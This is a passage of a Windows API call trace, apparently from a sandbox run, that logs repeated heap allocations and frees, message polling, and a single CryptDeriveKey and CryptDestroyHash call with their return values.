RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0212.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0212.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0212.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0212.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0212.596] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa870d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87290) returned 1 [0212.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0212.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0212.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0212.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0212.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0212.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0212.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0212.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0212.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0212.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0212.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0212.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0212.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0212.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0212.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0212.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0212.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0212.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0212.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0212.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0212.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0212.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0212.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0212.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0212.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0212.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0212.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0212.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0212.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0212.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0212.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0212.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0212.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0212.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0212.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0212.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0212.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0212.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0212.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0212.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0212.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0212.600] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0212.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0212.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0212.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0212.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0212.600] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.600] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0212.600] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0212.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0212.601] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0212.601] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0212.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0212.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0212.601] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0212.601] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0212.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0212.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0212.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0212.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0212.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0212.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0212.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0212.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69988 [0212.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69988, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0212.602] CryptDestroyHash (hHash=0xa870d0) returned 1 [0212.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0212.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0212.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0212.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0212.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0212.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0212.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0212.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0212.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0212.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0212.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0212.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0212.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0212.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0212.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0212.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0212.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0212.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0212.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0212.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0212.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0212.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0212.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0212.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0212.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0212.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0212.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0212.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0212.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0212.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0212.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0212.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0212.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0212.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0212.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0212.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0212.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0212.605] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0212.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0212.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0212.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0212.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0212.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0212.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0212.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0212.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0212.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0212.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0212.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0212.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0212.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0212.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0212.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0212.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0212.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0212.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0212.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0212.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0212.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0212.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0212.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0212.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 